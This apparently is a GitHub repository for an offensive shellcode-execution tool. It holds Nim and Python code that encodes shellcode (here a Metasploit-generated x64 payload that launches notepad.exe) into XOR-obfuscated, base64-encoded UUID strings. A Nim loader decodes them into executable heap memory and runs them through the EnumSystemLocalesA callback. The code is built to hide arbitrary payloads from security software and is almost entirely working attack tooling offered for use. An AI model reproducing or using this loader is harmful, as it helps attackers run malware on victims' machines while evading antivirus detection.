├── README.md ├── greetings.nim ├── shellcodeToUUID.py └── uuid_exec_bin.nim /README.md: -------------------------------------------------------------------------------- 1 | # uuid_exec_shellcode 2 | uuid-shellcode-execution 3 | -------------------------------------------------------------------------------- /greetings.nim: -------------------------------------------------------------------------------- 1 | #[ 2 | Author: StudyCat 3 | Blog: https://www.cnblogs.com/studycat 4 | Github: https://github.com/StudyCat404/uuid_exec_shellcode 5 | 6 | References: 7 | - https://github.com/ChoiSG/UuidShellcodeExec/blob/main/shellcodeToUUID.py 8 | ]# 9 | import winim 10 | import os 11 | import base64 12 | import random 13 | 14 | proc gkkaekgaEE(s: string, key: int): string {.noinline.} = 15 | # We need {.noinline.} here because otherwise C compiler 16 | # aggresively inlines this procedure for EACH string which results 17 | # in more assembly instructions 18 | var k = key 19 | result = string(s) 20 | for i in 0 ..< result.len: 21 | for f in [0, 8, 16, 24]: 22 | result[i] = chr(uint8(result[i]) xor uint8((k shr f) and 0xFF)) 23 | k = k +% 1 24 | 25 | proc convertToUUID(shellcode: var seq[byte]) = 26 | var 27 | fileName = "uuid.txt" 28 | outFile: File 29 | password: int 30 | outFile = open(fileName, fmAppend) 31 | randomize() 32 | password = rand(1024..65535) 33 | echo "XOR Password: ", password 34 | 35 | if len(shellcode) div 16 != 0 : 36 | for i in 1..(16 - (len(shellcode) mod 16)): 37 | shellcode.add(0x00) 38 | else: 39 | echo "test" 40 | for i in 0..(len(shellcode) div 16 - 1): 41 | var 42 | s = i*16 43 | e = s+15 44 | buf = shellcode[s..e] 45 | uid: UUID 46 | uidStr: RPC_CSTR 47 | line = "" 48 | 49 | copyMem(addr uid, addr buf[0], len(buf)) 50 | UuidToStringA(addr uid, addr uidStr) 51 | #line = "\"" & $uidStr & "\"," 52 | line = "\"" & encode(gkkaekgaEE($uidStr, password)) & "\"," 53 | outFile.writeLine(line) 54 | outFile.close() 55 | 56 | proc convertToUUID(fileName: string) = 57 | if fileExists(fileName): 58 | echo "Convert ", fileName, " to string UUID" 59 | echo "Output file: uuid.txt" 60 | var f: File 61 | f = open(fileName,fmRead) 62 | var fileSize = f.getFileSize() 63 | var shellcode = newSeq[byte](fileSize) 64 | discard readBytes(f,shellcode,0,fileSize) 65 | convertToUUID(shellcode) 66 | f.close() 67 | else: 68 | echo "The system cannot find the file specified." 69 | 70 | proc help() = 71 | let pathSplit = splitPath(paramStr(0)) 72 | echo "Usage:" 73 | echo "\t", pathSplit.tail, " filename" 74 | 75 | when defined(windows): 76 | when isMainModule: 77 | if paramCount() > 0: 78 | var p1 = paramStr(1) 79 | if p1 in ["/?","-h","--help"]: 80 | help() 81 | else: 82 | convertToUUID(p1) 83 | else: 84 | help() -------------------------------------------------------------------------------- /shellcodeToUUID.py: -------------------------------------------------------------------------------- 1 | import uuid 2 | 3 | def convertToUUID(shellcode): 4 | # If shellcode is not in multiples of 16, then add some nullbytes at the end 5 | if len(shellcode) % 16 != 0: 6 | print("[-] Shellcode's length not multiplies of 16 bytes") 7 | print("[-] Adding nullbytes at the end of shellcode, this might break your shellcode.") 8 | print("\n[*] Modified shellcode length: ", len(shellcode)+(16-(len(shellcode)%16))) 9 | 10 | addNullbyte = b"\x00" * (16-(len(shellcode)%16)) 11 | shellcode += addNullbyte 12 | 13 | uuids = [] 14 | for i in range(0, len(shellcode), 16): 15 | uuidString = str(uuid.UUID(bytes_le=shellcode[i:i+16])) 16 | uuids.append('"'+uuidString+'"') 17 | 18 | return uuids 19 | 20 | def main(): 21 | # Copy/Paste the MessageBox payload here 22 | buf = b"" 23 | buf += b"\xfc\x48\x83\xe4\xf0\xe8\xc0\x00\x00\x00\x41\x51\x41" 24 | buf += b"\x50\x52\x51\x56\x48\x31\xd2\x65\x48\x8b\x52\x60\x48" 25 | buf += b"\x8b\x52\x18\x48\x8b\x52\x20\x48\x8b\x72\x50\x48\x0f" 26 | buf += b"\xb7\x4a\x4a\x4d\x31\xc9\x48\x31\xc0\xac\x3c\x61\x7c" 27 | buf += b"\x02\x2c\x20\x41\xc1\xc9\x0d\x41\x01\xc1\xe2\xed\x52" 28 | buf += b"\x41\x51\x48\x8b\x52\x20\x8b\x42\x3c\x48\x01\xd0\x8b" 29 | buf += b"\x80\x88\x00\x00\x00\x48\x85\xc0\x74\x67\x48\x01\xd0" 30 | buf += b"\x50\x8b\x48\x18\x44\x8b\x40\x20\x49\x01\xd0\xe3\x56" 31 | buf += b"\x48\xff\xc9\x41\x8b\x34\x88\x48\x01\xd6\x4d\x31\xc9" 32 | buf += b"\x48\x31\xc0\xac\x41\xc1\xc9\x0d\x41\x01\xc1\x38\xe0" 33 | buf += b"\x75\xf1\x4c\x03\x4c\x24\x08\x45\x39\xd1\x75\xd8\x58" 34 | buf += b"\x44\x8b\x40\x24\x49\x01\xd0\x66\x41\x8b\x0c\x48\x44" 35 | buf += b"\x8b\x40\x1c\x49\x01\xd0\x41\x8b\x04\x88\x48\x01\xd0" 36 | buf += b"\x41\x58\x41\x58\x5e\x59\x5a\x41\x58\x41\x59\x41\x5a" 37 | buf += b"\x48\x83\xec\x20\x41\x52\xff\xe0\x58\x41\x59\x5a\x48" 38 | buf += b"\x8b\x12\xe9\x57\xff\xff\xff\x5d\x48\xba\x01\x00\x00" 39 | buf += b"\x00\x00\x00\x00\x00\x48\x8d\x8d\x01\x01\x00\x00\x41" 40 | buf += b"\xba\x31\x8b\x6f\x87\xff\xd5\xbb\xe0\x1d\x2a\x0a\x41" 41 | buf += b"\xba\xa6\x95\xbd\x9d\xff\xd5\x48\x83\xc4\x28\x3c\x06" 42 | buf += b"\x7c\x0a\x80\xfb\xe0\x75\x05\xbb\x47\x13\x72\x6f\x6a" 43 | buf += b"\x00\x59\x41\x89\xda\xff\xd5\x6e\x6f\x74\x65\x70\x61" 44 | buf += b"\x64\x2e\x65\x78\x65\x00" 45 | 46 | uuids = convertToUUID(buf) 47 | print(*uuids, sep=",\n") 48 | 49 | main() -------------------------------------------------------------------------------- /uuid_exec_bin.nim: -------------------------------------------------------------------------------- 1 | #[ 2 | Author: StudyCat 3 | Blog: https://www.cnblogs.com/studycat 4 | Github: https://github.com/StudyCat404/uuid_exec_shellcode 5 | 6 | References: 7 | - https://github.com/byt3bl33d3r/OffensiveNim/blob/master/src/uuid_exec_bin.nim 8 | ]# 9 | 10 | import winim 11 | import strformat 12 | import base64 13 | 14 | proc gkkaekgaEE(s: cstring, key: int): cstring {.noinline.} = 15 | # We need {.noinline.} here because otherwise C compiler 16 | # aggresively inlines this procedure for EACH string which results 17 | # in more assembly instructions 18 | var k = key 19 | result = cstring(s) 20 | for i in 0 ..< result.len: 21 | for f in [0, 8, 16, 24]: 22 | result[i] = chr(uint8(result[i]) xor uint8((k shr f) and 0xFF)) 23 | k = k +% 1 24 | 25 | when defined(windows): 26 | 27 | when defined(amd64): 28 | echo "[*] Running in x64 Process" 29 | # msfvenom -a x64 -p windows/x64/exec CMD=notepad.exe EXITFUNC=thread 30 | const SIZE = 16289 # len of UUIDARR 31 | var xorpassword = 2021 # xor password use by gkkaekgaEE 32 | var UUIDARR = allocCStringArray([ 33 | "19PU3tuM2I/H3dDCw9iRxsrI3cvGxc3Wn5rKODk6Ozw9Pjs4", 34 | "hIeFjt+J1I/Hj46RkNjMysbJ3ZuYycTWwsibO28+PT89Pz8w", 35 | "gNnU3oreio3Hi92RxtjBxZPD3cnGzcjWysnIODk6Pm05Njc5", 36 | "0tHQ397d3NvH2djHxtjEw8LB3c/OzczWysnIODk6Ozw9Pj8w", 37 | ...... 38 | "0tHQ397d3NvH2djHxtjEw8LB3c/OzczWysnIODk6Ozw9Pj8w", 39 | "0tHQ397d3NvH2djHxtjEw8LB3c/OzczWysnIODk6Ozw9Pj8w", 40 | "0tHQ397d3NvH2djHxtjEw8LB3c/OzczWysnIODk6Ozw9Pj8w",]) 41 | 42 | when isMainModule: 43 | # Creating and Allocating Heap Memory 44 | echo fmt"[*] Allocating Heap Memory" 45 | let hHeap = HeapCreate(HEAP_CREATE_ENABLE_EXECUTE, 0, 0) 46 | let ha = HeapAlloc(hHeap, 0, 0x100000) 47 | var hptr = cast[DWORD_PTR](ha) 48 | if hptr != 0: 49 | echo fmt"[+] Heap Memory is Allocated at 0x{hptr.toHex}" 50 | else: 51 | echo fmt"[-] Heap Alloc Error " 52 | quit(QuitFailure) 53 | 54 | echo fmt"[*] UUID Array size is {SIZE}" 55 | # Planting Shellcode From UUID Array onto Allocated Heap Memory 56 | for i in 0..(SIZE-1): 57 | #var status = UuidFromStringA(cast[RPC_CSTR](UUIDARR[i]), cast[ptr UUID](hptr)) 58 | var status = UuidFromStringA(cast[RPC_CSTR](gkkaekgaEE(decode($UUIDARR[i]), xorpassword)), cast[ptr UUID](hptr)) 59 | if status != RPC_S_OK: 60 | if status == RPC_S_INVALID_STRING_UUID: 61 | echo fmt"[-] Invalid UUID String Detected" 62 | else: 63 | echo fmt"[-] Something Went Wrong, Error Code: {status}" 64 | quit(QuitFailure) 65 | hptr += 16 66 | echo fmt"[+] Shellcode is successfully placed between 0x{(cast[DWORD_PTR](ha)).toHex} and 0x{hptr.toHex}" 67 | 68 | # Calling the Callback Function 69 | echo fmt"[*] Calling the Callback Function ..." 70 | EnumSystemLocalesA(cast[LOCALE_ENUMPROCA](ha), 0); 71 | CloseHandle(hHeap) 72 | quit(QuitSuccess) 73 | --------------------------------------------------------------------------------